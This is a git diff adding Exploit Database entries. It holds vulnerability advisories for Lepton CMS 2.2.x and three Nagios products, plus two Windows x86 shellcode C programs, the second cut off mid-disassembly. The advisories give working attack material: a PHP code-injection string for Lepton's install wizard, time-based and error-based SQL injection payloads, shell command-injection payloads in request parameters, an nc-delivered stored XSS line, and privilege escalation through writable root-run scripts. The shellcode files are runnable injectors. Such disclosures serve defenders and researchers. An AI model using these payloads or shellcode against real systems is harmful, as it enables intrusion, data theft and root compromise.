+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40248.txt b/platforms/php/webapps/40248.txt
new file mode 100755
index 000000000..879541cec
--- /dev/null
+++ b/platforms/php/webapps/40248.txt
@@ -0,0 +1,141 @@
+[+] Credits: John Page (HYP3RLINX)
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.lepton-cms.org
+
+
+
+Product:
+=================================
+Lepton CMS 2.2.0 / 2.2.1 (update)
+
+LEPTON is an easy-to-use but full customizable Content Management System
+(CMS).
+
+
+
+
+Vulnerability Type:
+===================
+PHP Code Injection
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+No input validation check is done on the "Database User" input field when
+entering Lepton CMS setup information using the Install Wizard.
+Therefore, a malicious user can input whatever they want in "config.php",
+this can allow for PHP Remote Command Execution on the Host system.
+
+e.g.
+
+In the database username field, single quote to close "DB_USERNAME" value
+then open our own PHP tags.
+
+');?>
+
+Now in "config.php" the Database username becomes ===>
+define('DB_USERNAME', '');?>');
+
+A security check attempt is made by Lepton to disallow making multiple HTTP
+requests for "config.php". On line 3 of "config.php" file we find.
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////
+
+if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted
+to load \'config.php\' twice!!
+Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
+
+///////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+However, the security check is placed on line 3 way before "LEPTON_PATH"
+has been defined allowing complete bypass of that access control check.
+Now we can inject our own PHP code into the config allowing Remote Command
+Execution or Local/Remote File Includes etc...
+
+Next, make HTTP GET request to "http://victim-server/upload/install/save.php"
+again and code execution will be achieved or request "config.php"
+directly as the security check made on line 3 of "config.php" to prevent
+multiple HTTP requests to "config.php" does NOT work anyhow.
+
+In situations where an installation script is provided as part of a some
+default image often available as a convenience by hosting providers, this
+can
+be used to gain code execution on the target system and bypass whatever
+security access controls/restrictions etc.
+
+References:
+http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
+
+
+Exploit code(s):
+===============
+
+1) At step 4 of Leptons Install Wizard, enter ');?> for Database User name, then fill in rest of fields
+
+2) Click go to step 5 and fill in required fields, then click "Install
+LEPTON"
+
+3) Make HTTP GET request to:
+
+ http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
+
+ OR
+
+ http://localhost/LEPTON_stable_2.2.0/upload/config.php
+
+
+BOOM pop calc.exe...
+
+
+
+Disclosure Timeline:
+===========================================================
+Attempted Vendor Notification: June 11, 2016 (No replies)
+Vendor Notification on July 12, 2016 ( thanks Henri Salo )
+Vendor Acknowledgement: July 13, 2016
+Vendor fixes: July 14, 2016
+Vendor release version 2.2.2 : August 12, 2016
+August 15, 2016 : Public Disclosure
+
+
+
+
+Severity Level:
+================
+High
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+HYP3RLINX
diff --git a/platforms/php/webapps/40250.txt b/platforms/php/webapps/40250.txt
new file mode 100755
index 000000000..b91d7e51a
--- /dev/null
+++ b/platforms/php/webapps/40250.txt
@@ -0,0 +1,170 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+Nagios Log Server Multiple Vulnerabilities
+Affected versions: Nagios Log Server <= 1.4.1
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Log Server application is affected by multiple security
+vulnerabilities, including authentication bypass, stored cross-site
+scripting, inconsistent authorization controls and privilege escalation.
+
+These vulnerabilities can be chained together to obtain unauthenticated
+remote code execution in the context of the root user.
+
+
++------------+
+|Exploitation|
++------------+
+==Authentication Bypass==
+Authentication for the Nagios Log Server web management interface can be
+bypassed due to an insecure implementation of the function validating
+session cookies within the ‘Session.php’ file. As shown below, the
+application uses a base64 encoded serialized PHP string along with a
+SHA1 HMAC checksum as the cookie to authenticate and manage user
+sessions. A sample cookie format is shown below:
+
+a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123";
+s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
+Gecko/20100101 Firefox/46.0";
+s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user";
+s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}
+
+The application relies on the validation against the SHA1 HMAC to
+recognize and destroy invalid session cookies when the checksum value
+does not match. However the encryption key used to generate the HMAC
+checksum is statically set to the SHA1 hash value of the
+$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
+This information can be controlled by the attacker and as such should
+not be considered a secure randomly generated value for the secret
+encryption key.
+
+Since no further verification is performed for other non-predictable
+fields (e.g. session_id, apikey, email, username etc.) and only a valid
+user agent string matching the correct HTTP header value is required, an
+attacker can forge arbitrary session cookies and bypass authentication.
+
+The script on the following page generates session cookies which are
+accepted and validated successfully by the application. A ‘user_id’
+value of 1 can be used to initiate a session in the context of the admin
+user.
+
+[POC - nagiosls_forge_cookie.php]
+
+
+
+This vulnerability is present across multiple Nagios products.
+
+
+==Stored Cross-Site Scripting==
+The Nagios Log Server application does not validate and HTML encode log
+data sent by configured sources. This issue is aggravated by the fact
+that the application does not maintain a list of authorized log sources,
+but instead accept data from any host connecting to the Nagios Log
+Server port responsible of collecting logs (TCP 5544). An attacker can
+exploit this vulnerability to send malicious JavaScript code and execute
+it in the context of Nagios Log Server user session as shown below.
+
+[POC STORED XSS]
+# echo '' | nc [TARGET IP] 5544
+
+The payload gets rendered under '/nagioslogserver/dashboard'.
+
+==Inconsistent Authorization Controls==
+The Nagios Log Server application provides intended functionality to
+define custom alert commands using different configuration options. By
+default, only administrative users can define alert commands which
+execute scripts on the Log Server filesystem when an alert is triggered.
+
+However, the application does not properly enforce authorization checks
+and an attacker can access the same functionality in the context of a
+standard user session by providing the correct payload in the ‘alert’
+POST parameter. This functionality can be abused to obtain remote code
+execution on the target system as the application does not restrict the
+script definition to a single folder and an attacker can specify
+absolute paths to any script or executable file present on the Log
+Server host.
+
+[POC - CREATE COMMAND EXECUTION ALERT]
+URL => /nagioslogserver/api/check/create/1
+Method => POST
+Payload =>
+alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1",
+"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch",
+"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"}
+
+
+==Privilege Escalation==
+The default Log Server application sudoers configuration allows the
+‘apache’ user to run the ‘get_logstash_ports.sh’ script as root without
+being prompted for a password. However insecure file write permissions
+have been granted to the 'nagios' group for the ‘get_logstash_ports.sh’
+script file. Since the apache user is a member of the 'nagios' group, an
+attacker can overwrite the script contents with arbitrary data.
+
+Details about the script with insecure permissions are provided below:
+PATH => /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
+PERMISSIONS => rwxrwxr-x nagios nagios
+
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Log Server 1.4.2
+
+
++------------+
+| Timeline |
++------------+
+2/06/2016 – Initial disclosure to vendor
+3/06/2016 – Vendor acknowledges receipt of advisory
+22/07/2016 – Vendor releases patched software version
+11/08/2016 – Public disclosure
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf
\ No newline at end of file
diff --git a/platforms/php/webapps/40251.txt b/platforms/php/webapps/40251.txt
new file mode 100755
index 000000000..062293b3e
--- /dev/null
+++ b/platforms/php/webapps/40251.txt
@@ -0,0 +1,191 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+Nagios Network Analyzer Multiple Vulnerabilities
+Affected versions: Nagios Network Analyzer <= 2.2.0
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Network Analyzer application is affected by multiple security
+vulnerabilities, including authentication bypass, SQL injection,
+arbitrary code execution via command injection and privilege escalation.
+
+These vulnerabilities can be chained together to obtain unauthenticated
+remote code execution in the context of the root user.
+
++------------+
+|Exploitation|
++------------+
+==Authentication Bypass==
+Authentication for the Nagios Network Analyzer web management interface
+can be bypassed due to an insecure implementation of the function
+validating session cookies within the ‘Session.php’ file. As shown
+below, the application uses a base64 encoded serialized PHP string along
+with a SHA1 HMAC checksum as the cookie to authenticate and manage user
+sessions. A sample cookie format is shown below:
+
+ a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx";
+ s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
+Gecko/20100101 Firefox/46.0";s:13:"last_activity";
+ i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email";
+ s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";
+ s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession";
+ b:1;s:7:"view_id";i:0;}
+
+The application relies on the validation against the SHA1 HMAC to
+recognize and destroy invalid session cookies when the checksum value
+does not match. However the encryption key used to generate the HMAC
+checksum is statically set to the SHA1 hash value of the
+$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
+This information can be controlled by the attacker and as such should
+not be considered a secure randomly generated value for the secret
+encryption key.
+
+Since no further verification is performed for other non-predictable
+fields (e.g. session_id, apikey, email, username etc.) and only a valid
+user agent string matching the correct HTTP header value is required, an
+attacker can forge arbitrary session cookies and bypass authentication.
+
+The script on the following page generates session cookies which are
+accepted and validated successfully by the application. A ‘user_id’
+value of 1 can be used to initiate a session in the context of the admin
+user.
+
+[POC - nagiosna_forge_cookie.php]
+
+
+This vulnerability is present across multiple Nagios products.
+
+
+==SQL Injection==
+Multiple SQL injection vulnerabilities exist in the application web
+management interface. An attacker can exploit this vulnerabilities to
+retrieve sensitive data from the application MySQL database.
+
+URL =>
+/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=&o%5Bsort%5D=ASC
+Method => GET
+Parameter => o[col]
+POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
+
+URL =>
+/nagiosna/index.php/api/sources/read?o%5Bcol%5D=&o%5Bsort%5D=ASC
+Method => GET
+Parameter => o[col]
+POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
+
+URL => /nagiosna/index.php/admin/globals
+Method => POST
+Parameter => timezone
+POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT
+COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS
+CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT
+0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
+GROUP BY x)a) AND '%'=''
+
+
+==Command Injection==
+A command injection vulnerability exists in the function generating PDF
+reports for download. Base64 encoded user-supplied input is passed as an
+argument to system shell calls without being escaped. An attacker can
+inject arbitrary shell commands and obtain remote code execution in the
+context of the apache user.
+
+URL => /nagiosna/index.php/download/report/sourcegroup//
+Method => GET
+POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
+
+URL => /nagiosna/index.php/download/report/source//
+Method => GET
+POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
+
+Arbitrary code execution in the context of the ‘nna’ user can also be
+obtained by abusing the intended functionality to define custom alert
+commands. As shown in the next section, this exposes the application to
+additional privilege escalation attack vectors.
+
+
+==Privilege Escalation==
+The default application sudoers configuration allows the ‘apache’ and
+‘nna’ users to run multiple Bash and Python scripts as root without
+being prompted for a password. The 'apache' user is in the 'nnacmd'
+group, which has insecure write permissions to multiple script files. An
+attacker can overwrite their contents with a malicious payload (i.e.
+spawn a shell) and escalate privileges to root.
+
+The script files with insecure permissions are listed below:
+
+PATH => /usr/local/nagiosna/bin/rc.py
+PERMISSIONS => rwxrwxr-t nna nnacmd
+
+PATH => /usr/local/nagiosna/scripts/change_timezone.sh
+PERMISSIONS => rwsrwsr-t nna nnacmd
+
+PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh
+PERMISSIONS => rwsrwsr-t nna nnacmd
+
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Network Analyzer 2.2.2.
+
+
++------------+
+| Timeline |
++------------+
+2/06/2016 – Initial disclosure to vendor
+3/06/2016 – Vendor acknowledges receipt of advisory
+3/06/2016 – Vendor releases new software build (2.2.1)
+8/07/2016 – Inform vendor about insecure fix (generation of encryption
+key based on epoch)
+9/07/2016 – Vendor confirms issue and replies with new fix
+01/08/2016 – Vendor releases patched software version
+11/08/2016 – Public disclosure
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf
\ No newline at end of file
diff --git a/platforms/php/webapps/40252.txt b/platforms/php/webapps/40252.txt
new file mode 100755
index 000000000..eddfab579
--- /dev/null
+++ b/platforms/php/webapps/40252.txt
@@ -0,0 +1,124 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+Nagios Incident Manager Multiple Vulnerabilities
+Affected versions: Nagios Incident Manager <= 2.0.0
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
+
++-----------+
+|Description|
++-----------+
+The Nagios Incident Manager application is vulnerable to multiple
+vulnerabilities, including remote code execution via command injection,
+SQL injection and stored cross-site scripting.
+
+
++------------+
+|Exploitation|
++------------+
+==Command Injection==
+Multiple command injection vulnerabilities exist within the incident
+report file generation functionality as user input is passed to system
+shell calls without validation. A limited non-administrative user, who
+by default does not have permissions to add custom MIME types for
+incident file attachments, can exploit these vulnerabilities to obtain
+remote code execution on the Incident Manager system as the ‘apache’ user.
+
+URL => /nagiosim/reports/download//mttr/
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download//closed/
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download//first_response/
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+URL => /nagiosim/reports/download//general/
+Method => GET
+POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
+"";{touch,/tmp/MYFILE};echo
+
+
+==SQL Injection==
+The Nagios IM admin functionality to update the application settings is
+vulnerable to an SQL Injection vulnerability via error-based payloads.
+An attacker can inject into the ‘timezone’ POST parameter and retrieve
+sensitive information from the application MySQL database.
+
+URL => /nagiosim/admin/settings
+Method => POST
+Parameter => timezone
+Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
+COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
+CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
+
+
+==Stored Cross-Site Scripting==
+Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
+web interface, allowing a standard user to insert malicious JavaScript
+payloads into administrative and non-administrative application
+functionality. This attack vector could be used by an authenticated
+attacker with standard user privileges to hijack the session of an admin
+user and extend their permissions within the application (e.g. adding
+PHP as a valid MIME type for file attachments).
+
+URL => /nagiosim/incidents/add
+Method => POST
+Parameters => title, summary, priority, file_description, status
+Render => /nagiosim/incidents, /nagiosim/incidents/details/
+POC Payload =>
+
+URL => /nagiosim/api/incidents//messages
+Method => POST
+Parameters => title
+Render => /nagiosim/incidents/details/
+POC Payload =>
+
+URL => /nagiosim/profile
+Method => POST
+Parameters => username, first_name, last_name
+Render => /nagiosim/admin/users, Global Menu Banner (username)
+POC Payload =>
+
++----------+
+| Solution |
++----------+
+Upgrade to Nagios Incident Manager 2.0.1
+
+
++------------+
+| Timeline |
++------------+
+2/06/2016 - Initial disclosure to vendor
+3/06/2016 - Vendor acknowledges receipt of advisory
+8/07/2016 - Vendor releases patched software version (2.0.1)
+11/08/2016 – Public disclosure
+
+
+
++------------+
+| Additional |
++------------+
+Further information is available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
\ No newline at end of file
diff --git a/platforms/win_x86/shellcode/40245.c b/platforms/win_x86/shellcode/40245.c
new file mode 100755
index 000000000..d265601b9
--- /dev/null
+++ b/platforms/win_x86/shellcode/40245.c
@@ -0,0 +1,273 @@
+/*
+ # Title : Windows x86 MessageBoxA shellcode
+ # Author : Roziul Hasan Khan Shifat
+ # Date : 14-08-2016
+ # Tested On : Windows 7 starter x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+ 0: 31 c9 xor %ecx,%ecx
+ 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
+ 6: 8b 40 0c mov 0xc(%eax),%eax
+ 9: 8b 70 14 mov 0x14(%eax),%esi
+ c: ad lods %ds:(%esi),%eax
+ d: 96 xchg %eax,%esi
+ e: ad lods %ds:(%esi),%eax
+ f: 8b 48 10 mov 0x10(%eax),%ecx
+ 12: 31 db xor %ebx,%ebx
+ 14: 8b 59 3c mov 0x3c(%ecx),%ebx
+ 17: 01 cb add %ecx,%ebx
+ 19: 8b 5b 78 mov 0x78(%ebx),%ebx
+ 1c: 01 cb add %ecx,%ebx
+ 1e: 8b 73 20 mov 0x20(%ebx),%esi
+ 21: 01 ce add %ecx,%esi
+ 23: 31 d2 xor %edx,%edx
+
+00000025 :
+ 25: 42 inc %edx
+ 26: ad lods %ds:(%esi),%eax
+ 27: 01 c8 add %ecx,%eax
+ 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
+ 2f: 75 f4 jne 25
+ 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
+ 38: 75 eb jne 25
+ 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
+ 41: 75 e2 jne 25
+ 43: 8b 73 1c mov 0x1c(%ebx),%esi
+ 46: 01 ce add %ecx,%esi
+ 48: 8b 14 96 mov (%esi,%edx,4),%edx
+ 4b: 01 ca add %ecx,%edx
+ 4d: 89 d6 mov %edx,%esi
+ 4f: 89 cf mov %ecx,%edi
+ 51: 31 db xor %ebx,%ebx
+ 53: 53 push %ebx
+ 54: 68 61 72 79 41 push $0x41797261
+ 59: 68 4c 69 62 72 push $0x7262694c
+ 5e: 68 4c 6f 61 64 push $0x64616f4c
+ 63: 54 push %esp
+ 64: 51 push %ecx
+ 65: ff d2 call *%edx
+ 67: 83 c4 10 add $0x10,%esp
+ 6a: 31 c9 xor %ecx,%ecx
+ 6c: 68 6c 6c 42 42 push $0x42426c6c
+ 71: 88 4c 24 02 mov %cl,0x2(%esp)
+ 75: 68 33 32 2e 64 push $0x642e3233
+ 7a: 68 75 73 65 72 push $0x72657375
+ 7f: 54 push %esp
+ 80: ff d0 call *%eax
+ 82: 83 c4 0c add $0xc,%esp
+ 85: 31 c9 xor %ecx,%ecx
+ 87: 68 6f 78 41 42 push $0x4241786f
+ 8c: 88 4c 24 03 mov %cl,0x3(%esp)
+ 90: 68 61 67 65 42 push $0x42656761
+ 95: 68 4d 65 73 73 push $0x7373654d
+ 9a: 54 push %esp
+ 9b: 50 push %eax
+ 9c: ff d6 call *%esi
+ 9e: 83 c4 0c add $0xc,%esp
+ a1: 31 d2 xor %edx,%edx
+ a3: 31 c9 xor %ecx,%ecx
+ a5: 52 push %edx
+ a6: 68 73 67 21 21 push $0x21216773
+ ab: 68 6c 65 20 6d push $0x6d20656c
+ b0: 68 53 61 6d 70 push $0x706d6153
+ b5: 8d 14 24 lea (%esp),%edx
+ b8: 51 push %ecx
+ b9: 68 68 65 72 65 push $0x65726568
+ be: 68 68 69 20 54 push $0x54206968
+ c3: 8d 0c 24 lea (%esp),%ecx
+ c6: 31 db xor %ebx,%ebx
+ c8: 43 inc %ebx
+ c9: 53 push %ebx
+ ca: 52 push %edx
+ cb: 51 push %ecx
+ cc: 31 db xor %ebx,%ebx
+ ce: 53 push %ebx
+ cf: ff d0 call *%eax
+ d1: 31 c9 xor %ecx,%ecx
+ d3: 68 65 73 73 41 push $0x41737365
+ d8: 88 4c 24 03 mov %cl,0x3(%esp)
+ dc: 68 50 72 6f 63 push $0x636f7250
+ e1: 68 45 78 69 74 push $0x74697845
+ e6: 8d 0c 24 lea (%esp),%ecx
+ e9: 51 push %ecx
+ ea: 57 push %edi
+ eb: ff d6 call *%esi
+ ed: 31 c9 xor %ecx,%ecx
+ ef: 51 push %ecx
+ f0: ff d0 call *%eax
+*/
+
+
+/*
+section .text
+ global _start
+_start:
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->Ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+;--------------------------------------------------
+
+
+xor edx,edx
+g:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz g
+cmp dword [eax+4],'rocA'
+jnz g
+cmp dword [eax+8],'ddre'
+jnz g
+
+
+;-----------------------------------------------------
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+;---------------------------------
+
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;------------------
+mov esi,edx
+mov edi,ecx
+;--------------------
+
+;finding address of LoadLibraryA()
+xor ebx,ebx
+push ebx
+push 0x41797261
+push 0x7262694c
+push 0x64616f4c
+
+
+push esp
+push ecx
+
+call edx
+
+add esp,16
+;---------------------------
+xor ecx,ecx
+
+;LoadLibraryA("user32.dll")
+push 0x42426c6c
+mov [esp+2],byte cl
+push 0x642e3233
+push 0x72657375
+
+
+push esp
+call eax
+
+;-------------------------
+
+;Finding address of MessageBoxA()
+add esp,12
+xor ecx,ecx
+push 0x4241786f
+mov [esp+3],byte cl
+push 0x42656761
+push 0x7373654d
+
+push esp
+push eax
+
+call esi
+
+;---------------------------------
+add esp,12
+
+;----------------
+;MessageBoxA(NULL,"Sample msg!!","hi There",1)
+
+xor edx,edx
+xor ecx,ecx
+
+
+push edx
+push 0x21216773
+push 0x6d20656c
+push 0x706d6153
+
+lea edx,[esp] ; "Sample msg!!"
+
+push ecx
+push 0x65726568
+push 0x54206968
+
+lea ecx,[esp] ; "hi There"
+
+xor ebx,ebx
+
+inc ebx
+
+
+push ebx
+push edx
+push ecx
+xor ebx,ebx
+push ebx
+
+call eax
+
+
+;----------------------
+xor ecx,ecx
+push 0x41737365
+mov [esp+3],byte cl
+push 0x636f7250
+push 0x74697845
+
+
+lea ecx,[esp]
+
+
+push ecx
+push edi
+
+call esi
+
+;---------------
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include
+#include
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}
diff --git a/platforms/win_x86/shellcode/40246.c b/platforms/win_x86/shellcode/40246.c
new file mode 100755
index 000000000..ddfe6c341
--- /dev/null
+++ b/platforms/win_x86/shellcode/40246.c
@@ -0,0 +1,328 @@
+/*
+ # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
+ # Author : Roziul Hasan Khan Shifat
+ # Date : 15-08-2016
+ # Tested On : Windows 7 x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+ 0: 31 c9 xor %ecx,%ecx
+ 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
+ 6: 8b 40 0c mov 0xc(%eax),%eax
+ 9: 8b 70 14 mov 0x14(%eax),%esi
+ c: ad lods %ds:(%esi),%eax
+ d: 96 xchg %eax,%esi
+ e: ad lods %ds:(%esi),%eax
+ f: 8b 48 10 mov 0x10(%eax),%ecx
+ 12: 31 db xor %ebx,%ebx
+ 14: 8b 59 3c mov 0x3c(%ecx),%ebx
+ 17: 01 cb add %ecx,%ebx
+ 19: 8b 5b 78 mov 0x78(%ebx),%ebx
+ 1c: 01 cb add %ecx,%ebx
+ 1e: 8b 73 20 mov 0x20(%ebx),%esi
+ 21: 01 ce add %ecx,%esi
+ 23: 31 d2 xor %edx,%edx
+
+00000025 :
+ 25: 42 inc %edx
+ 26: ad lods %ds:(%esi),%eax
+ 27: 01 c8 add %ecx,%eax
+ 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
+ 2f: 75 f4 jne 25
+ 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
+ 38: 75 eb jne 25
+ 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
